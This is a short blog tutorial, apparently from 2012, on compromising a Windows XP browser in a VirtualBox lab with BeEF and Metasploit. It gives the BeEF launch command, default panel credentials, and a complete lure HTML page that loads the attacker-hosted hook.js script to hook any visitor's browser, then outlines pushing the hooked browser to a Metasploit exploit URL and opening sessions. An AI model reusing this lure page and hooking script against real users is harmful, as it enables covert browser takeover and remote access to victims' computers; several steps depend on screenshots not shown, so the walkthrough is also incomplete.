Rabu, 29 Februari 2012

EXPLOITASI WINDOWS XP USING METASPLOIT AND beEF

On this case i will doing Exploitasi browser at Windows xp using beEF.  The Browser Exploitation Framework (BeEF) is a powerful professional security tool. BeEF is pioneering techniques that provide the experienced penetration tester with practical client side attack vectors. 


1. please run your beEF


root@bt:/pentest/web/beef# ./beef 



2. Open your browser and into this url http://127.0.0.1:3000/ui/panel

username : beef
Pass : beef

3. showing


4. OK prepare your html, in this case i using

<html>
  <head>
    <title></title>
    <meta content="">
    <style></style>
  </head>
  <body bgcolor="black">
  <center>
<script src="http://192.168.56.1:3000/hook.js" type="text/javascript"></script> 
<font color="white"><blink>HI ALL MY NAME IS AYU TING-TING</blink> </font><br>

<img src="Ayu Ting Ting.jpg" alt="ayu">  <br>
<input type="submit" value="cari_gambar_lain" name="tombol">
  </body>
</html>

and save with name ayu.html then save at /var/www/(create your folder ex: 'deef') deef/ 



5. open your window xp in virtual box


6. Control panel beEF

after we know that the Browser has infected by beEF, let's preparing to exploit

7. open msfconsole


copy  http://127.0.0.1:8080/Uf7syLPj but change the IP 192.168.56.1

into

press execute

look at that we success exploit
- sesseion -l


-session -l 1


Finally we success.. ok waiting for next trick :)












Tidak ada komentar:

Posting Komentar